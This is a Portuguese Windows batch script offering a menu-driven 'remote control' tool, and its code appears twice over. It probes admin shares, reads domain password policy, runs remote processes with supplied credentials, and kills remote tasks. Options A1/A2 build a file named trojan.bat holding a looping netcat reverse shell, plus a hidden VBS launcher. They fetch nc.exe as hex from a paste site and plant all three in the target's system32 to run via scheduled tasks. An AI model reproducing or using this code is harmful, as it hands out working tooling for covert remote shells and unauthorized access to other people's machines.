Acesso remoto em Batch
@echo off
:: usar tasklist e taskkill
:: http://pastebin.com/YCgDxTY6
:: http://pastebin.com/Ts40iBV0 versão errada
:: http://batch-satti.forumeiros.com/t2103-controlar-pcs-remotamente-versao-10#11669
setlocal enabledelayedexpansion
set user=!username!
set user2=!user!
set host=!computername!
set host2=!computername!
set pclan=!computername!
if /I "%~1" NEQ "" (
ping -n 1 %~1 > nul
if !errorlevel!==0 set pclan=%~1
)
set pcnet=!pclan!
set ver=1.53
set hd=
set root=
:menu
mode 110,42
cls
Title !username! - Control
set user=!username!
set host=!computername!
set user2=!user!
set host2=!computername!
set hd=NAO
dir \\!pclan!\c$ > nul 2>&1
if "!errorlevel!"=="0" (set hd=SIM)
set root=NAO
at \\!pclan! > nul 2>&1
if "!errorlevel!"=="0" ( set root=SIM)
echo.ÿÿÿÿÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo.ÿÿÿÿº Controle_Remoto VersÆo !ver! º
echo. ºAcesse: http://batch-satti.forumeiros.com - comando color imbutidoº
echo.ÿÿÿÿÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo.ÿÿÿÿºÿÿ Usuario : !user2:~0,19! º
echo.ÿÿÿÿºÿÿ HOST1 : !host2:~0,19! º
echo.ÿÿÿÿºÿÿ pc_remoto: !pcnet:~0,19! º
echo.ÿÿÿÿÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿº Possue acesso ao C$ do !pcnet:~0,19! : !hd! º
echo.ÿÿÿÿº Pode executar processos em !pcnet:~0,19! : !root! º
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿºÿ1. Alterar pc_remoto º
echo.ÿÿÿÿºÿ2. Alterar Usuario º
echo.ÿÿÿÿºÿ3. Ver informa‡äes sobre um usuario º
echo.ÿÿÿÿºÿ4. Ver informa‡äes sobre os padräes de senhas º
if "!root!"=="SIM" (echo.ÿÿÿÿºÿ5. Executar um processo remotamente º)
if "!hd!"=="SIM" (echo.ÿÿÿÿºÿ6. Para Mapear Y: no compartilhamento C$ de !pcnet:~0,19! º)
if "!hd!"=="SIM" (echo.ÿÿÿÿºÿ7. Gerenciador de tarefas remoto via prompt de comando º)
echo.ÿÿÿÿºÿ9. Executar processo remotamente mediante pc,user,password º
echo.ÿÿÿÿºÿ10. Abre outro Controle Remoto Batch º
echo.ÿÿÿÿºÿA1. PREPARA NET CAT - ARQUIVOS NO PC LOCAL º
echo.ÿÿÿÿºÿA2. EXECUTA NET CAT - ARQUIVOS NO PC REMOTO º
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿºÿ0. Para sair Digite cmd para acessar prompt em maquina local º
echo.ÿÿÿÿÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set opcao=cls
set /p opcao=Digite sua op‡Æo:
if "!opcao:~0,5!"=="color" (
!OPCAO!
pause
goto :menu
)
SET OPCAO=!opcao:a=A!
if "!opcao!"=="10" (
start cmd /c "%~f0 !pclan!"
)
if "!opcao!"=="A1" (
goto :netcat_parte1
)
if "!opcao!"=="A2" (
goto :netcat_parte2
)
if "!opcao!"=="9" (
set /p maquina=Maquina:
set /p usuario=Usuario:
set /p password=Senha :
set /p processo=Process :
WMIC /NODE:!maquina! /user:!usuario! /Password:!password! process call create "!processo!"
)
if "!opcao!"=="7" (
cls
:taskmgrcmd
title 0 voltar - 1 listar processos - [PID] para finalizar
tasklist -s !pclan!
echo. 0. para voltar
echo. 1. para listar processos em !pclan!
echo. [PID] para finalizar processos em !pclan!
set /p opcao=Digite sua op‡Æo:
if "!opcao!"=="0" ( goto :menu)
if "!opcao!"=="1" ( goto :taskmgrcmd)
if /i !opcao! GTR 10 ( taskkill -s !pclan! -f -pid !opcao! -t )
goto :taskmgrcmd
)
if "!opcao!"=="1" (
set /p pclan=Digite o nome do pc_remoto:
ping -n 1 !pclan! > nul
if !ERRORLEVEL!==1 (
ECHO. Host indisponivel, ou firewall rigoroso...
pause
goto :menu
)
set pcnet=!pclan!
goto :menu
)
if "!opcao!"=="2" (
set /p user=Digite o [dominio]\[nome do usuario]:
echo. runas /user:!user! "%~f0 !pclan!"
runas /user:!user! "%~f0 !pclan!"
if "!ERRORLEVEL!"=="1" (
echo. NÆo Foi poss¡vel efetuar login...
pause
goto :menu
)
exit/b
)
if "!opcao!"=="3" (
set /p opcao=Digite o nome do usuario:
cls
net user !opcao! /domain
pause
goto :menu
)
if "!opcao!"=="4" (
cls
echo. ---------INFO WORKSTATION----------
net accounts
echo. ------INFO PASSWORD DOMINIO--------
net accounts /domain
pause
goto :menu
)
if "!opcao!"=="5" (
cls
echo. Executar processo remotamente....
echo. Computador remoto: !pclan!
echo. Para mandar mensagem digite: "c:\windows\system32\msg.exe * ola mundo"
set /p programa=Digite o nome do programa:
:executaprograma
echo. 'AT \\!pclan! 23:59 /INTERACTIVE "!programa!"'
FOR /F "TOKENS=1,2,3,4,5,6,7,8 delims= " %%a in ('AT \\!pclan! 23:59 /INTERACTIVE "!programa!"') do (
set trabalho=%%h
)
at \\!pclan!
SCHTASKS /RUN /S !pclan! /TN AT!trabalho!
pause
AT \\!pclan! !trabalho! /delete
goto :menu
)
if "!opcao!"=="6" (
cls
echo. Verificando Acesso, aguarde...
dir \\!pclan!\C$ > NUL
if !ERRORLEVEL!==1 (
ECHO. Acesso negado...
pause
goto :menu
)
echo. Existe acesso....
net use y: /delete /yes
NET USE Y: \\!pclan!\C$
ECHO. UNIDADES MAPEADAS:
NET USE
PAUSE
goto :menu
)
if "!opcao!"=="0" goto :eof
if "!opcao!"=="00" goto :eof
if "!opcao!"=="cmd" (
start cmd /k "Title !username! logged"
goto :menu
)
GOTO :menu
:netcat_parte1
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
echo. Gerando trojan.bat...
::trojan.bat
::trojan.bat
::trojan.bat
(
echo.@echo off
echo.:1
echo.nc !computername! 8001 -e cmd.exe
echo.ping -n 2 !computername! > nul
echo.goto :1
)>c:\trojan.bat
echo. Gerando background.vbs...
::background.vbs
(
echo.Set objShell = CreateObject^("Wscript.Shell"^)
echo.objShell.Run "trojan.bat",0,true
)>c:\background.vbs
if exist c:\nc.exe ( start c:\nc.exe -l -p 8001 -vv & pause & goto :menu )
::nc.exe - netcat
::nc.exe - netcat
::nc.exe - netcat
echo Bj@jzh`0X-`/PPPPPPa(DE(DM(DO(Dh(Ls(Lu(LX(LeZRR]EEEUYRX2Dx=>h2b.com
echo 0DxFP,0Xx.t0P,=XtGsB4o@$?PIyU WwX0GwUY Wv;ovBX2Gv0ExGIuht6>>h2b.com
echo ?@}I{uNWEF~NFAa_Lj@KLtH]~CEvEFIKbAa_wN@SuNS`{ECCttasae~BHM>>h2b.com
echo AcjFnvnHAwrvx[}gIKDw??Frt\gqj~{?s?csIsqo{O_KtBve{Sx{nB{Eu@>>h2b.com
echo fq`tkfk?e@oKCA_?_E@?WxAs?agBwRjnLK?s@w`G`LKLAcyA?@xAsZpk`L>>h2b.com
echo ~KxlqLct@vAc_A_yBJ@xAGZp?o?sBXq`LR@xUrFQt=A_E?B?~rB?~r0>>h2b.com
echo. Carregando codigo hexa de nc.exe - Aguarde...
call :html http://paste.ubuntu.com/533893/
echo. gerando nc.exe - Aguarde...
h2b "::WIL" < hexawil.txt >c:\nc.exe
echo. NC.EXE gerado...
echo. Saia e utilize a sintaxe nc -h
start c:\nc.exe -l -p 8001 -vv
dir c:\nc.exe
dir c:\trojan.bat
pause
GOTO :menu
:HTML
echo. Loading...
(
echo.Dim objADODB, objIE
echo.Dim strText
echo.Set objIE = CreateObject^( "InternetExplorer.Application" ^)
echo.With objIE
echo. .Navigate "%*"
echo. .Visible = False
echo. Do While .Busy
echo. WScript.Sleep 25
echo. Loop
echo. strText = .Document.Body.InnerText
echo. Do While .Busy
echo. WScript.Sleep 25
echo. Loop
echo. .Quit
echo.End With
echo.Set objADODB = CreateObject^( "ADODB.Stream" ^)
echo.With objADODB
echo. .Open
echo. .Type = 2
echo. .CharSet = "us-ascii"
echo. .WriteText strText
echo. .SaveToFile "hexawil.txt", 2
echo. .Close
echo.End With
)>wget.vbs
cscript //nologo wget.vbs
exit/b
:netcat_parte2
if not exist Y:\windows\system32 (
echo. Y:\windows\system32 nÆo localizado
echo. Tentando mapear...
net use y: /delete /yes
NET USE Y: \\!pclan!\C$
pause
if not exist Y:\windows\system32 (goto :menu)
)
IF NOT EXIST Y:\windows\system32\nc.exe (
COPY c:\nc.exe Y:\windows\system32 /y
)
IF NOT EXIST Y:\windows\system32\trojan.bat (
COPY c:\trojan.bat Y:\windows\system32 /y
)
IF NOT EXIST Y:\windows\system32\background.vbs (
COPY c:\background.vbs Y:\windows\system32 /y
)
set programa=background.vbs
goto :executaprograma
goto :menu
:: usar tasklist e taskkill
:: http://pastebin.com/YCgDxTY6
:: http://pastebin.com/Ts40iBV0 versão errada
:: http://batch-satti.forumeiros.com/t2103-controlar-pcs-remotamente-versao-10#11669
setlocal enabledelayedexpansion
set user=!username!
set user2=!user!
set host=!computername!
set host2=!computername!
set pclan=!computername!
if /I "%~1" NEQ "" (
ping -n 1 %~1 > nul
if !errorlevel!==0 set pclan=%~1
)
set pcnet=!pclan!
set ver=1.53
set hd=
set root=
:menu
mode 110,42
cls
Title !username! - Control
set user=!username!
set host=!computername!
set user2=!user!
set host2=!computername!
set hd=NAO
dir \\!pclan!\c$ > nul 2>&1
if "!errorlevel!"=="0" (set hd=SIM)
set root=NAO
at \\!pclan! > nul 2>&1
if "!errorlevel!"=="0" ( set root=SIM)
echo.ÿÿÿÿÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo.ÿÿÿÿº Controle_Remoto VersÆo !ver! º
echo. ºAcesse: http://batch-satti.forumeiros.com - comando color imbutidoº
echo.ÿÿÿÿÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo.ÿÿÿÿºÿÿ Usuario : !user2:~0,19! º
echo.ÿÿÿÿºÿÿ HOST1 : !host2:~0,19! º
echo.ÿÿÿÿºÿÿ pc_remoto: !pcnet:~0,19! º
echo.ÿÿÿÿÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿº Possue acesso ao C$ do !pcnet:~0,19! : !hd! º
echo.ÿÿÿÿº Pode executar processos em !pcnet:~0,19! : !root! º
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿºÿ1. Alterar pc_remoto º
echo.ÿÿÿÿºÿ2. Alterar Usuario º
echo.ÿÿÿÿºÿ3. Ver informa‡äes sobre um usuario º
echo.ÿÿÿÿºÿ4. Ver informa‡äes sobre os padräes de senhas º
if "!root!"=="SIM" (echo.ÿÿÿÿºÿ5. Executar um processo remotamente º)
if "!hd!"=="SIM" (echo.ÿÿÿÿºÿ6. Para Mapear Y: no compartilhamento C$ de !pcnet:~0,19! º)
if "!hd!"=="SIM" (echo.ÿÿÿÿºÿ7. Gerenciador de tarefas remoto via prompt de comando º)
echo.ÿÿÿÿºÿ9. Executar processo remotamente mediante pc,user,password º
echo.ÿÿÿÿºÿ10. Abre outro Controle Remoto Batch º
echo.ÿÿÿÿºÿA1. PREPARA NET CAT - ARQUIVOS NO PC LOCAL º
echo.ÿÿÿÿºÿA2. EXECUTA NET CAT - ARQUIVOS NO PC REMOTO º
echo.ÿÿÿÿºÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ º
echo.ÿÿÿÿºÿ0. Para sair Digite cmd para acessar prompt em maquina local º
echo.ÿÿÿÿÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set opcao=cls
set /p opcao=Digite sua op‡Æo:
if "!opcao:~0,5!"=="color" (
!OPCAO!
pause
goto :menu
)
SET OPCAO=!opcao:a=A!
if "!opcao!"=="10" (
start cmd /c "%~f0 !pclan!"
)
if "!opcao!"=="A1" (
goto :netcat_parte1
)
if "!opcao!"=="A2" (
goto :netcat_parte2
)
if "!opcao!"=="9" (
set /p maquina=Maquina:
set /p usuario=Usuario:
set /p password=Senha :
set /p processo=Process :
WMIC /NODE:!maquina! /user:!usuario! /Password:!password! process call create "!processo!"
)
if "!opcao!"=="7" (
cls
:taskmgrcmd
title 0 voltar - 1 listar processos - [PID] para finalizar
tasklist -s !pclan!
echo. 0. para voltar
echo. 1. para listar processos em !pclan!
echo. [PID] para finalizar processos em !pclan!
set /p opcao=Digite sua op‡Æo:
if "!opcao!"=="0" ( goto :menu)
if "!opcao!"=="1" ( goto :taskmgrcmd)
if /i !opcao! GTR 10 ( taskkill -s !pclan! -f -pid !opcao! -t )
goto :taskmgrcmd
)
if "!opcao!"=="1" (
set /p pclan=Digite o nome do pc_remoto:
ping -n 1 !pclan! > nul
if !ERRORLEVEL!==1 (
ECHO. Host indisponivel, ou firewall rigoroso...
pause
goto :menu
)
set pcnet=!pclan!
goto :menu
)
if "!opcao!"=="2" (
set /p user=Digite o [dominio]\[nome do usuario]:
echo. runas /user:!user! "%~f0 !pclan!"
runas /user:!user! "%~f0 !pclan!"
if "!ERRORLEVEL!"=="1" (
echo. NÆo Foi poss¡vel efetuar login...
pause
goto :menu
)
exit/b
)
if "!opcao!"=="3" (
set /p opcao=Digite o nome do usuario:
cls
net user !opcao! /domain
pause
goto :menu
)
if "!opcao!"=="4" (
cls
echo. ---------INFO WORKSTATION----------
net accounts
echo. ------INFO PASSWORD DOMINIO--------
net accounts /domain
pause
goto :menu
)
if "!opcao!"=="5" (
cls
echo. Executar processo remotamente....
echo. Computador remoto: !pclan!
echo. Para mandar mensagem digite: "c:\windows\system32\msg.exe * ola mundo"
set /p programa=Digite o nome do programa:
:executaprograma
echo. 'AT \\!pclan! 23:59 /INTERACTIVE "!programa!"'
FOR /F "TOKENS=1,2,3,4,5,6,7,8 delims= " %%a in ('AT \\!pclan! 23:59 /INTERACTIVE "!programa!"') do (
set trabalho=%%h
)
at \\!pclan!
SCHTASKS /RUN /S !pclan! /TN AT!trabalho!
pause
AT \\!pclan! !trabalho! /delete
goto :menu
)
if "!opcao!"=="6" (
cls
echo. Verificando Acesso, aguarde...
dir \\!pclan!\C$ > NUL
if !ERRORLEVEL!==1 (
ECHO. Acesso negado...
pause
goto :menu
)
echo. Existe acesso....
net use y: /delete /yes
NET USE Y: \\!pclan!\C$
ECHO. UNIDADES MAPEADAS:
NET USE
PAUSE
goto :menu
)
if "!opcao!"=="0" goto :eof
if "!opcao!"=="00" goto :eof
if "!opcao!"=="cmd" (
start cmd /k "Title !username! logged"
goto :menu
)
GOTO :menu
:netcat_parte1
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
:: ****geraarquivos***** ****geraarquivos***** ****geraarquivos***** ****geraarquivos*****
echo. Gerando trojan.bat...
::trojan.bat
::trojan.bat
::trojan.bat
(
echo.@echo off
echo.:1
echo.nc !computername! 8001 -e cmd.exe
echo.ping -n 2 !computername! > nul
echo.goto :1
)>c:\trojan.bat
echo. Gerando background.vbs...
::background.vbs
(
echo.Set objShell = CreateObject^("Wscript.Shell"^)
echo.objShell.Run "trojan.bat",0,true
)>c:\background.vbs
if exist c:\nc.exe ( start c:\nc.exe -l -p 8001 -vv & pause & goto :menu )
::nc.exe - netcat
::nc.exe - netcat
::nc.exe - netcat
echo Bj@jzh`0X-`/PPPPPPa(DE(DM(DO(Dh(Ls(Lu(LX(LeZRR]EEEUYRX2Dx=>h2b.com
echo 0DxFP,0Xx.t0P,=XtGsB4o@$?PIyU WwX0GwUY Wv;ovBX2Gv0ExGIuht6>>h2b.com
echo ?@}I{uNWEF~NFAa_Lj@KLtH]~CEvEFIKbAa_wN@SuNS`{ECCttasae~BHM>>h2b.com
echo AcjFnvnHAwrvx[}gIKDw??Frt\gqj~{?s?csIsqo{O_KtBve{Sx{nB{Eu@>>h2b.com
echo fq`tkfk?e@oKCA_?_E@?WxAs?agBwRjnLK?s@w`G`LKLAcyA?@xAsZpk`L>>h2b.com
echo ~KxlqLct@vAc_A_yBJ@xAGZp?o?sBXq`LR@xUrFQt=A_E?B?~rB?~r0>>h2b.com
echo. Carregando codigo hexa de nc.exe - Aguarde...
call :html http://paste.ubuntu.com/533893/
echo. gerando nc.exe - Aguarde...
h2b "::WIL" < hexawil.txt >c:\nc.exe
echo. NC.EXE gerado...
echo. Saia e utilize a sintaxe nc -h
start c:\nc.exe -l -p 8001 -vv
dir c:\nc.exe
dir c:\trojan.bat
pause
GOTO :menu
:HTML
echo. Loading...
(
echo.Dim objADODB, objIE
echo.Dim strText
echo.Set objIE = CreateObject^( "InternetExplorer.Application" ^)
echo.With objIE
echo. .Navigate "%*"
echo. .Visible = False
echo. Do While .Busy
echo. WScript.Sleep 25
echo. Loop
echo. strText = .Document.Body.InnerText
echo. Do While .Busy
echo. WScript.Sleep 25
echo. Loop
echo. .Quit
echo.End With
echo.Set objADODB = CreateObject^( "ADODB.Stream" ^)
echo.With objADODB
echo. .Open
echo. .Type = 2
echo. .CharSet = "us-ascii"
echo. .WriteText strText
echo. .SaveToFile "hexawil.txt", 2
echo. .Close
echo.End With
)>wget.vbs
cscript //nologo wget.vbs
exit/b
:netcat_parte2
if not exist Y:\windows\system32 (
echo. Y:\windows\system32 nÆo localizado
echo. Tentando mapear...
net use y: /delete /yes
NET USE Y: \\!pclan!\C$
pause
if not exist Y:\windows\system32 (goto :menu)
)
IF NOT EXIST Y:\windows\system32\nc.exe (
COPY c:\nc.exe Y:\windows\system32 /y
)
IF NOT EXIST Y:\windows\system32\trojan.bat (
COPY c:\trojan.bat Y:\windows\system32 /y
)
IF NOT EXIST Y:\windows\system32\background.vbs (
COPY c:\background.vbs Y:\windows\system32 /y
)
set programa=background.vbs
goto :executaprograma
goto :menu